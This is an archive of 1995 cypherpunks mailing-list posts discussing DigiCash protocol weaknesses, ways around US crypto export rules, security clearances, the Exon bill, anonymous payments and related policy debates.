
mQBtAzCNppQAAAEDALhWZl7IuGZ9zZT5bACo0b/1L0Nv0C72vKHIO3IHh+cwpHHa
2Ozb9aeO0UvXGwkkZIYgUm0EvmzKh7yb1GTLvBp5kXpR3I9w+Yj4LGlBDERpUWw6
x4ED49pwDnz1Hl5FBQAFEbQYYXNoIDxhaHVwcEBwcmltZW5ldC5jb20+
=PtJK
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 7 Dec 95 10:03:05 PST
To: support@marktwain.com
Subject: Re: Still more on the Digicash protocol
Message-ID: <199512071803.KAA18623@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Mark Twain Ecash Support <support@marktwain.com>
> Let us contemplate in which type of situation the payee will send such a
> wildcard coin. To pay a shop via TCP? No. The payment request comes in with
> the shop ID. The resulting payment won't be done with a wildcard coin.
> 
> So when will the user pay with a wildcard coin? To make a payment to a party
> that is (pseudo-) anonymous to the payor. That is, if the payor sends the
> payment via anonymous remailer, in which case the messages should be
> encrypted anyway.

There might be some situations where it is useful to send a wildcard
coin even via a TCP connection.  For example, a pseudonymous server
might pop up at some internet address different from its real one, make
some transactions, and then go away.  Or someone might set up an
anonymous account at some public server (like c2.org) and conduct
business anonymously on an ongoing basis.  In either case the payee
would be anonymous to the payor even though they communicated via TCP.
The shop would have to send its payment request using "@" as the
shop_accID field (I have heard of an undocumented "-X <payee>" switch
in the Unix ecash program which allows the shop software to control
this field in the payment request).

We have also discussed the "pipe-net" which would allow anonymous TCP
connections.  This does not look like it can be as secure as the remailer
net but for occasional or short-term use it can provide considerable
privacy protection.

I am glad that DigiCash supports this type of cash which anyone can
deposit.  Actually, I am surprised and puzzled that it does, given
Chaum's apparent reluctance to endorse schemes to allow payee anonymity
(due to political problems, apparently).  It would be interesting to hear
how DigiCash envisions this feature being used, and whether they plan to
continue to allow it.  Since it is not well documented (if at all) it's
possible that they don't plan to keep it.

But if they do, I think it would be good to adapt the protocols so this
feature is usable over TCP connections.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 7 Dec 95 07:06:01 PST
To: Mats Bergstrom <cypherpunks@toad.com
Subject: Re: 1)Age etc CA 2)Swedish Digicash
Message-ID: <2.2b8.32.19951207150646.006874cc@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:56 PM 12/7/95 +0100, Mats Bergstrom wrote:

>Posten has licensed Digicash and plans to
>open a mint/bank (Posten already is closely connected to a bank)
>dealing in Swedish crowns. (This is not news but things seem to
>be moving right now.) Some (but slight) mention of laundering,
>of course. It's supposed to come about in 'the beginning of next
>year'. I wonder how exchanges crowns/dollars will be managed.

Is there an existing Post Office Bank in Sweden?  If so, can foreigners open
accounts?  The UK's postal bank (Girobank) has become more like a normal
bank and I think foreigners can open accounts.  (The US Postal Savings
System was closed in 1956 or so.)  I'd rather have a Swedish Digicash
account than one in the US.

DCF

"A bank is just a money switch.  Soon we'll all have money switches."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Twain Ecash Support <support@marktwain.com>
Date: Thu, 7 Dec 95 08:09:15 PST
To: daw@guaymas.CS.Berkeley.EDU (David A Wagner)
Subject: Re: Still more on the Digicash protocol
Message-ID: <199512071610.KAA16536@admin.starnet.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:01 PM 12/6/95 -0500, you wrote:

>Hal has pointed out that payments & deposits with a wildcard in the
>payment_hdr should NOT be sent in the clear, since they can be stolen
>by any passive eavesdropper.

Let us contemplate in which type of situation the payee will send such a
wildcard coin. To pay a shop via TCP? No. The payment request comes in with
the shop ID. The resulting payment won't be done with a wildcard coin.

So when will the user pay with a wildcard coin? To make a payment to a party
that is (pseudo-) anonymous to the payor. That is, if the payor sends the
payment via anonymous remailer, in which case the messages should be
encrypted anyway.

[Why a remailed message should be encrypted is left as an exercise to the
reader.]

>Ian has pointed out the same problem with cancellations: the payer_code
>should NOT be sent in the clear, since any passive eavesdropper can
>grab this info and steal the corresponding payment.

As mentioned before, this will be fixed.


>Anyhow, the obvious solution is encryption.  Our new observation is
>that encrypting deposits & cancellations with the mint's public key
>is not enough to solve the problem.

[Argument in support of claim elided... I am not conviced.]

>While I'm ranting, let me also remind you of a problem Ian discovered
>earlier through reverse-engineering: the payment & deposit messages aren't
>encrypted,
[...]
>With traffic analysis, if payers use the default TCP connection, all
>this information about them can be compiled.  If I target a payer, I'll
>probably be able to record all his transactions (unless he's using
>remailers or pipenet).  If I sit outside a small business, I can compile
>a dossier on its buying habits.

One more time: this is only an issue if the payor is using a secure http
connection. Otherwise, you can gather all that information with out without
Ecash. The next release will use an already established SSL connection to
transmit this information, should the payor request it.

>Worse still, anonymity for the shop is worse with Digicash than with real
>cash.  If I pay you real cash on a secluded street, you're fairly anonymous.
>If I pay you Digicash over the Internet, any passive eavesdropper could be
>recording your identy and the whole transaction.  Blech.

This is raising an issue that has nothing to do with Ecash. The complaint is
in fact about the lack of a gereral link encryption on the Internet. I agree
that this is needed, but providing it really isn't Ecash's job. I am eagerly
anticipating the general use of IPSEC.

>  (Yes, this means shops will need to have certificates if you want
>  to avoid a man-in-the-middle attack.  So be it.  Most online shops
>  will be using SSL, and thus have a certificate anyhow.  You can safely
>  punt on the authentication between customer <-> shop if you're not
>  worried about active attacks.)

That's why the next version will use existing SSL, should the user so desire.

>* add a big warning to the documentation: users should not use wildcards
>  in payments (unless they know the dangers & are encrypting with e.g. PGP).

Will do.

>* continue specifying the protocol at a deeper level, like you promised
>  (and throw in source for security-critical modules too, eh? :-)

Writing all this down takes time. DigiCash may hire a tech writer soon. That
should improve communications between all parties.

--Lucky Green


--Mark Twain Bank Ecash Support
  Ecash. The secure Internet payment system that protects your privacy.
  <http://www.marktwain.com/ecash.html>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jps@monad.semcor.com (Jack P. Starrantino)
Date: Thu, 7 Dec 95 07:16:05 PST
To: cypherpunks@toad.com
Subject: Re: latest librand source now av
Message-ID: <9512071516.AA01104@monad.semcor.com>
MIME-Version: 1.0
Content-Type: text/plain


an116512@anon.penet.fi writes

> ... [various profanities omitted] ...

The bad is getting worse. I don't know how these services work. Can I
killfile the account, or do I need to ax the host?

Many thanks.

jps
-- 
Jack P. Starrantino     (215) 674-0200 (voice)
SEMCOR, Inc.            (215) 443-0474 (fax)
65 West Street Road     jps@semcor.com
Suite C-100
Warminster, PA 18974



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dreschs@mpd.tandem.com (Sten Drescher)
Date: Thu, 7 Dec 95 08:23:10 PST
To: cypherpunks@toad.com
Subject: Re: Solution for US/Foreign Software?
In-Reply-To: <m0tNR0t-00093sC@pacifier.com>
Message-ID: <5568fsj0wg.fsf@galil.austnsc.tandem.com>
MIME-Version: 1.0
Content-Type: text/plain


jimbell@pacifier.com (jim bell) said:

jb> You miss the point!  There will be no "international effort"!  Here
jb> are the steps:

jb> 1.  Write a program limited to keysize, carefully constructed to
jb> isolate those portions of the program which define key size,
jb> GAKedness, etc.

jb> 2.  Get it export approved.  Export it.

jb> THEN

jb> 3.  Announce that a "US-only" version of the same program is being
jb> released, and include the minimal component which replaces the
jb> limited software.  Release it, only in the US of course!

	As has been pointed out, this would prolly doom geting export
approval for version 2.0.  However, let's keep the developer/publisher
out of the loop.  How about someone developing a 'binary diff', using
the functionality of nm to find subroutine entry points, and then doing
the binary diff from those starting points?  Presumably, for most of the
program the diff would mostly be changed entry points, with the bulk of
diff being the crypto module.  Then the bdiff gets exported, and
bpatch-ed into the export binary.  Of course, this wouldn't work if they
strip the binary, but who is going to force them to do that?

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dreschs@mpd.tandem.com (Sten Drescher)
Date: Thu, 7 Dec 95 08:56:08 PST
To: cypherpunks@toad.com
Subject: Re: Secret Clearance (was: re: NIST GAK export meeting, sv)
In-Reply-To: <199512062336.PAA14064@ix6.ix.netcom.com>
Message-ID: <55zqd4hku3.fsf@galil.austnsc.tandem.com>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart <stewarts@ix.netcom.com> said:

BS> Few, if any, other than companies already in the military business;
BS> secret clearances are _expensive_, usually take a long time to get,
BS> and the military only gives them to people who need them.

	Strange, the military processed a SECRET clearance on me even
before I signed on the dotted line.  Now a TS, that's expensive, but
they didn't have much on me other than my SSAN and, I think, my prints
to process the SECRET, so they couldn't have done much more than run be
through the FBI criminal database.

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <Kevin.L.Prigge-2@cis.umn.edu>
Date: Thu, 7 Dec 95 09:05:37 PST
To: cypherpunks@toad.com
Subject: RSA '96 Conference
Message-ID: <30c71f4f43fe002@noc.cis.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


This might be a little early, but will there be a cypherpunks
get together at RSA '96? Perhaps a Coed Naked Cypherpunks Key
Signing or something?

-- 
Kevin L. Prigge        |"A computer lets you make more mistakes faster 
UofM Central Computing | than any invention in human history--with the 
email: klp@umn.edu     | possible exceptions of handguns and tequila."
01001001110101100110001| - Mitch Ratcliffe



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 7 Dec 95 12:03:32 PST
To: dreschs@mpd.tandem.com (Sten Drescher)
Subject: Re: Solution for US/Foreign Software?
Message-ID: <m0tNm1C-00092KC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:26 AM 12/7/95 -0600, you wrote:
>jimbell@pacifier.com (jim bell) said:
>
>jb> 1.  Write a program limited to keysize, carefully constructed to
>jb> isolate those portions of the program which define key size,
>jb> GAKedness, etc.
>
>jb> 2.  Get it export approved.  Export it.
>
>jb> THEN
>
>jb> 3.  Announce that a "US-only" version of the same program is being
>jb> released, and include the minimal component which replaces the
>jb> limited software.  Release it, only in the US of course!
>
>	As has been pointed out, this would prolly doom geting export
>approval for version 2.0.  However, let's keep the developer/publisher
>out of the loop.  How about someone developing a 'binary diff', using
>the functionality of nm to find subroutine entry points, and then doing
>the binary diff from those starting points?  Presumably, for most of the
>program the diff would mostly be changed entry points, with the bulk of
>diff being the crypto module.  Then the bdiff gets exported, and
>bpatch-ed into the export binary.  Of course, this wouldn't work if they
>strip the binary, but who is going to force them to do that?

Okay, that was basically what I was suggesting.  A full binary difference
file wouldn't even need to have any information about the internals of the
program anyway.

Basically, what needs to be achieved is a way to allow the software
manufacturer to sell an approved product outside the country, but allow the
foreign buyer to (easily) convert it into a GOOD encryption product.  Once
that works, laws against the export of encryption are meaningless.  In fact,
the legally-exported program obviously wouldn't even need to HAVE encryption
in it at all, so it won't fall under ITAR classification, and thus won't
need any kind of export license. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: REES@rmcs.cranfield.ac.uk
Date: Thu, 7 Dec 95 03:33:15 PST
To: cypherpunks@toad.com
Subject: Plea for information
Message-ID: <951207113222.88b6@rmcs.cranfield.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


I would be interested in learning more about the politics and mathematics of
cryptography, but my site does not have access to a newsreader.  As I am new to
the Net, I am not aware of any acceptable way around this, which will allow me
to read and contribute to the cypherpunk and related newsgroups - please can
you help me out on this matter.  Also, I would like to know how best to
understand cryptography - I have a textbook on the basic mathematical concepts
underlying the techniques but it is too advanced for my current knowledge in
this field (A-level - ie. end of high school), please can you suggest a good
starting place for me.

Thanks in advance for your assistance,

Daniel Rees




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Thu, 7 Dec 95 09:53:12 PST
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: News on Congressional Debate on Exon
In-Reply-To: <01HYHWSWQVWG9S3RQJ@mbcl.rutgers.edu>
Message-ID: <Pine.ULT.3.91.951207115227.11932B-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 6 Dec 1995, E. ALLEN SMITH wrote:

>    The agreement makes it all but certain that if legislation overhauling
>    the nation's telecommunications laws is enacted, it will contain some
>    of the most sweeping anti-smut provisions ever imposed on computer
                               ^^^^
>    communications.
>    
>    The plan is part of negotiations on a larger telecommunications bill
>    and settles differences among House members who were deeply divided
>    over how to best limit children's exposure to smut carried on computer
                                                   ^^^^
>    services, including the global network, Internet.

(rest of biased language deleted to keep my lunch down.  Suffice it to 
say that "smut" is such a loaded term than it's a wonder anyone can see 
anything withing the framework of the constitution.)

>    Indecent speech, unlike obscenity, is protected under the First
>    Amendment. Though the House plan doesn't yet specifically define
>    "indecent," the standard legal and regulatory definition says it is
>    material that describes in terms patently offensive, as measured by
>    contemporary community standard, sexual or excretory activities or
>    organ.

That's obscenity folks.  That _is_ legally defined. (Miller, wasn't it?)


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMMcOhDokqlyVGmCFAQGRAAP+MUoTEogvkbpsjRhJKpfPkBgieXyY5atn
piD13JM/2Ev3cW3tj+HrxSUayb1n3jfXuu5wyVAC8ZFtjEHSKENALGt1ND7D8vQu
ZjdIohX+aK6BzT924GUlB0hGmoqPDUD7loz45/rYvtlJUt7HKnZHdniDgVsadvuG
T2mtD05dg9c=
=w5Q9
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GED/J d-- s:++>: a-- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+
K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++(+)>$ Y++ PGP++ t- 5+++ X++
R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y+**
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Thu, 7 Dec 95 10:17:20 PST
To: Bill.Humphries@msn.fullfeed.com
Subject: Re: Responding to Exon -- technology is not enough
Message-ID: <01HYIYF5CAAK9S3S5K@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"Bill.Humphries@msn.fullfeed.com"  6-DEC-1995 20:16:17.29

>Anyone wish to comment on the prospect of a double blind server, set
>outside U.S. borders, that can act as an interface to the rest of the
>world, perhaps encrypting or stego'ing the data transfered between it and
>the user? Basically, an anonymous remailer that acts as a cross between
>an NNTP, POP3, and SMTP servers.
------------------------------
	Encrypting data between the server and the user would probably not work
very well, due to the lack of cryptographic knowledge among most users (_I_
don't know how to set up PGP for a VAX (even if I had the room to store it
in my quota), and I have some interests in this stuff). However, something
where someone did a standard http link in, typed in a destination, and got put
 there in a way that would look like the person was coming in from the server
should work. For best bookmarking results, the added link should probably be
inside the link that it looked to the user like they were on. For instance,

http://www.anonserve.net/http/www.hotsex.com/

should bookmark properly, and be interpretable by the server as being a
command to do a http link to that that web location. I am admittedly not that
familiar with the root mechanism of the WWW, but I believe this would work.
	-Allen 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Christopher Kleiman" <ckleiman@fdic.gov>
Date: Thu, 7 Dec 95 09:53:23 PST
To: cypherpunks@toad.com
Subject: re: Re: Secret Clearance (was: re: NIST GAK export         meeting, sv)
Message-ID: <JSI8+hdmlka@DACS_DC_16.FDIC.GOV>
MIME-Version: 1.0
Content-Type: text/plain




Bill Stewart <stewarts@ix.netcom.com> said:

>>BS> secret clearances are _expensive_, usually take a long time to get,
>>BS> and the military only gives them to people who need them.

>	Strange, the military processed a SECRET clearance on me even
>before I signed on the dotted line.  Now a TS, that's expensive, but
>they didn't have much on me other than my SSAN and, I think, my prints
>to process the SECRET, so they couldn't have done much more than run be
>through the FBI criminal database.

>#include <disclaimer.h>				/* Sten Drescher 

Actually, you filled out some paperwork when you signed up that was sent 
forward; it wasn't much more than a check against all of the govts "evil type 
people" databases.  However, I understand that it depends on what Level of 
background check as well.  A limited background investigation involves 
filling out a long form saying that you've been a good boy/girl; it goes up 
from there.  "Civilians" are different from military as well; after all, in 
one they own you, in the other, you can actually go home at night.;-)

**
Nothing I say can be held as the viewpoint of my employer; I'm a short-timer 
any, so I really don't care what they think!

Chris
**




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Thu, 7 Dec 95 10:06:33 PST
To: <cypherpunks@toad.com
Subject: Re: Secret Clearance (was: re: NIST GAK export meeting, sv)
Message-ID: <9512071806.AA08617@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> Bill Stewart <stewarts@ix.netcom.com> said:
 
> BS> Few, if any, other than companies already in the military business;
> BS> secret clearances are _expensive_, usually take a long time to get,
> BS> and the military only gives them to people who need them.
 
> 	Strange, the military processed a SECRET clearance on me even
> before I signed on the dotted line.  Now a TS, that's expensive, but
> they didn't have much on me other than my SSAN and, I think, my prints
> to process the SECRET, so they couldn't have done much more than run be
> through the FBI criminal database.
> 
     It varies. My SECRET took almost a year and a personal interview
before it was granted. Living 13 years abroad in 5 countries, visiting
the eastern bloc, and having relatives over there, made DISA a bit
nervous. 

    Clearances tend to be easiest for nth generation midwesterners
who are just out of school, have never been anywhere, and have no
known relatives abroad.

    I never went for a TS - I figured it would be too much trouble, and
might have been turned down.  

speaking only for myself...



Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 7 Dec 95 13:30:17 PST
To: Aleph One <aleph1@dfw.net>
Subject: Re: [NOISE] Re: FW: websurfer 4.6
In-Reply-To: <Pine.SUN.3.91.951207144508.21791A-100000@dfw.net>
Message-ID: <Pine.ULT.3.91.951207131535.13367F-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Dec 1995, Aleph One wrote:

> On Thu, 7 Dec 1995, Rich Graves wrote:
> > 
> > It may interest you to know that Microsoft recently licensed a bunch of 
> > stuff from NetManage (San Jose Merc, no real details given).
> 
> Another interesting tid bit is thta the code for Microsfot Internet
> Explorer is licensed from Spry which has lincensed Java from Sun so
> theoricly Microsoft will get Java for free (so to speak) now the question
> is wheather they will be stupid enough to strip it out of their product
> because they want to push VB.

And the answer, if you believe what they say, is in a series of 
PowerPoint presentations and speech transcripts on Microsoft's Web
server.

  http://www.microsoft.com/internet/

I found Bill Gates' presentation rather amusing because he uses the term
"broadband" to mean "high bandwidth." He seems to have gotten confused
because ATM is supposed to be both. 

The bit on server tools says Microsoft plans to do everything. Doesn't 
look like they've really decided on anything.

Microsoft Internet Explorer will become the browser choice for everyone.

Microsoft Network will ensure that its content is fully accessible to any 
browser.

Microsoft's strategy is to support VB.

Microsoft's strategy is to support Java.

Microsoft's strategy is to support Blackbird.

Microsoft's strategy is to support HTML and VRML.

Microsoft supports Internet and Windows Standards (the latter are not 
defined).

The pictures were pretty, though, especially in the Maritz piece. (Which
was actually prepared by Bill Conte... how convenient that MS Office 
saves the author's name and other summary information by default.)

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 7 Dec 95 14:05:32 PST
To: Hal <hfinney@shell.portal.com>
Subject: Re: Still more on the Digicash protocol
Message-ID: <m0tNnxi-00090NC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:03 AM 12/7/95 -0800, you wrote:

>I am glad that DigiCash supports this type of cash which anyone can
>deposit.  Actually, I am surprised and puzzled that it does, given
>Chaum's apparent reluctance to endorse schemes to allow payee anonymity
>(due to political problems, apparently). 


I, on the other hand, think one of the best uses of digital cash is to
drastically reduce and eventually eliminate the whole concept of
"government."   I see payee-anonymous digital cash as being absolutely
essential.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Thu, 7 Dec 95 05:08:10 PST
To: cypherpunks@toad.com
Subject: 1)Age etc CA 2)Swedish Digicash
In-Reply-To: <aceb57071f0210045a46@[205.199.118.202]>
Message-ID: <Pine.HPP.3.91.951207130643.29281A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 6 Dec 1995, Timothy C. May wrote:

> For example, Sameer's c2.org could issue accounts to people who can prove
> they are over 18 (notarized copies of birth certif., passport, etc.).
> Sameer's system would then have a credential saying "this account name is
> over 18."

Isn't it in the coming that a federal agency, such as the Post Office,
will become the primary issuer of age-including 'physical identity'
certificates, based on such notarized copies? And store signed public
keys for everybody? It certainly is here, and the Swedish Post Office
(=Posten, with PostNet) wants to do it all. Perhaps this is tolerable,
with the condition that only the 'identity' has access to the private
key. Posten has yet not come out in public with any details of their
proposed system, such as key-pair generation.

Also, I can read in today's paper (in an article flanked by a picture
of David Chaum, and mentioning Mark Twain - not by name but as
'an American bank') that EU has given one of three 'IT prizes'
to Digicash and that Posten has licensed Digicash and plans to
open a mint/bank (Posten already is closely connected to a bank)
dealing in Swedish crowns. (This is not news but things seem to
be moving right now.) Some (but slight) mention of laundering,
of course. It's supposed to come about in 'the beginning of next
year'. I wonder how exchanges crowns/dollars will be managed.
Perhaps one will have to do it oneself for some time. If Posten
doesn't want to deal with it - at least for a start - I'm sure
Mark Twain will echange crowns to dollars for a fee, if only
Posten's system will be compatible. Lots of questions still
in limbo, though.

Mats





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Thu, 7 Dec 95 11:28:38 PST
To: jk@digit.ee
Subject: Re: 1)Age etc CA 2)Swedish Digicash
Message-ID: <01HYJ23QG1E29S3S5K@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"jk@digit.ee"  "Jyri Kaljundi"  7-DEC-1995 12:45:37.27

What about Estonia :) The taxes are low, there are a very few government 
regulations, the currency is very stable (based on German mark) ... One 
interesting law in Estonia is that the state budget must be balanced, so 
there is no way for the government to spend more money than it really has.

Technological level here is also quite good, and Internet is more popular
than in any other Eastern Europe or ex-USSR country. 

I think Estonia is an ideal place for such projects: high-tech companies 
testing their new technological ideas, inventions and business 
assumptions in real-life conditions. Just get yourself here !
--------
	The various Eastern European countries have been targeted before as
banking secrecy (read tax haven in the Feds' opinion) countries. Some others
might include Malta, although the Catholic influence there may make
pornography-related ventures problematic. On the other hand, using Malta would
make the conspiracy theorists go nuts...
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Thu, 7 Dec 95 11:32:44 PST
To: cypherpunks@toad.com
Subject: Who Protects Us from the "Protectors?"
Message-ID: <199512071933.OAA12319@pipe8.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


               Who Protects Us from the "Protectors?" 
         The Case of Father Ritter from Covenant House 
        (and the Relevance to the Crypto/G.A.K. Debate) 
 
The issue of the need to "protect children" is used as a major 
attack on quality crypto. The "kiddie pornographers" are described 
as one of the "four horsemen" who will, we are told, hide behind 
the crypto. Yet a review of the character and activities 
(medically, psychotherapeutically, ethically) of the very child 
protectors shows a tendency for some to be involved in the very 
activities they are ostensibly opposing. Worse, the public 
reputations built not infrequently serve to shield the individuals 
against public investigation of their own sexual activities. 
 
Father Bruce Ritter, one founder of Covenant House, is an example. 
 
Covenant House was originally started in New York City and located 
in the 42nd St. Times Square "porn district." The announced 
purpose of the organization was to protect runaway youth, arriving 
in NYC at the nearby interstate bus station, from sexual and other 
predations by the Square's denizens. 
 
Ritter soon developed a national reputation as a leading child 
protector. He was, for example, appointed a member of the 
President's Commission on Pornography ("Meese Commission.") There 
was only one fly in the ointment: Fr. Ritter was sexually involved 
with the very youth he was "protecting." 
 
So Ritter's anti-sexual persona (no sex education, "just say 
'no'," anti-condom distribution, anti-birth control, anti- 
abortion, clerical celibacy, anti-porn) covered his sexual 
practices. Ritter's fundraising to protect the children raised 
money for his hotel rooms. 
 
Worse, his public persona served to protect him as charges of his 
sexual proclivities surfaced. Ritter's supporters in the "save the 
children" coalitions did not investigate Ritter. They attacked the 
youth bringing charges against their saint. Some critics were 
charged with being fronts for the Times Square porn industry. 
Others had their honesty and their sanity questioned. 
 
Only when additional charges from additional youth surfaced and 
journalists "followed the money" trail did the true story of 
Ritter's sexual proclivities and masquerade develop. 
 
Critics of quality crypto and the internet demand that supporters 
of these things answer questions about what the supporters are 
doing to fight the "kiddie porn" forces. We should ask them the 
same question(s) about their own movement. Equally we should 
demand answers to the question of what they are doing to expose 
forces -- like Ritter -- who use the "protect the children" 
industry as camouflage for the very predations the industry 
ostensibly exists to fight.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Thu, 7 Dec 95 11:40:52 PST
To: pete@loshin.com
Subject: Re: Inherent Insecurity of Internet Commerce! (was RE: SecretClearance)
Message-ID: <01HYJ2LA0XJS9S3S5K@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"pete@loshin.com"  "Pete Loshin"  7-DEC-1995 14:37:13.07

OK, I'll try again. First, as I recall, SECRET clearance 
is actually not very high: when I got it, I had to answer 
a bunch of questions (do you abuse illegal drugs? are 
you now or have you ever been a member of any 
organizations? have you ever been _arrested_ for anything?) 
----------------------
	I suspect I know what organizations they're interested in (CPUSA et
al), but did they ask about any specific organizations?
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Thu, 7 Dec 95 12:50:20 PST
To: Rich Graves <llurch@networking.stanford.edu>
Subject: [NOISE] Re: FW: websurfer 4.6
In-Reply-To: <199512072012.PAA21672@bb.hks.net>
Message-ID: <Pine.SUN.3.91.951207144508.21791A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Dec 1995, Rich Graves wrote:

> On Thu, 7 Dec 1995, Anonymous wrote:
> 
> > Not surprising. They confuse random doodling with software, too.
> > 
> > The real problem with NetManage is a severe case of brain death.
> 
> My, thanks for your opinion.
> 
> It may interest you to know that Microsoft recently licensed a bunch of 
> stuff from NetManage (San Jose Merc, no real details given).
> 
> - -rich

Another interesting tid bit is thta the code for Microsfot Internet
Explorer is licensed from Spry which has lincensed Java from Sun so
theoricly Microsoft will get Java for free (so to speak) now the question
is wheather they will be stupid enough to strip it out of their product
because they want to push VB.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Thu, 7 Dec 95 12:01:01 PST
To: cypherpunks@toad.com
Subject: Multiple questions
Message-ID: <199512072002.PAA64046@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello again cypherpunks:

[In order to conserve bandwidth, I am going to ask for 5 things at
once which have nothing to do with each-other in this post. Please
reply to me privately if it's at all possible. <liberty@gate.net> ]

1. I have searched the archives for the author/artist of the "Rose on
Random Bits" logo, and I have e-mailed many cypherpunks "old-timers"
with no luck. [The logo appears at the top of the archives, but I am
well aware that, as an anarchy, cypherpunks has no "official logo."]
I have seen a number of beautiful logos during this search, but no-
body has pointed me to the author of this particular logo. Any help
finding this person would be _much_ appreciated. TIA.

2. I keep hearing every once-in-a-while about PGP3.0 (coming "real-
soon-now") but there's nothing specific about what's delaying it. I
would urge the developers (whoever they are) to release version 3.0
*before* the upcoming US presidential election, and I am interested
in finding out more. TIA.

3. I have been asked by a Libertarian Party presidential candidate
for a proposed platform plank in favor of strong, private, non-"GAK"
encryption. [OK! I've stopped saying "FUCKED"!<g>] Of course, I want
the maximum cypherpunk input possible, so feel free to suggest. The
wording must *not* be too technical in nature and should (of course)
condemn ITAR. <spit!> It should explain the real meaning of "escrow"
and the "Newspeak" version in as few words as possible. TIA for any
help on this. I'll post my final version if there's enough interest.

4. Has anyone in France been prosecuted for civilly-disobeying their
anti-strong-crypto law by using PGP? What happened? Did the French
people just roll over? TIA for any pointers (in English, please).

5. [A comment] Assuming the "secret clearance" requirement, how fast
could an escrow agency be decertified if the "secret" person dies or
is fired or heads for Anguilla, etc.? [Of course, I would not give a
secret key to such a system, considering the effectiveness of simple
attacks like "the honey trap" (ask Mordechai Vanunu how this attack
works).]
JMR
- ----------------------------------------------------------------------
Regards, Jim Ray
http://www.shopmiami.com/prs/jimray
- -----------------------------------------------------------------------
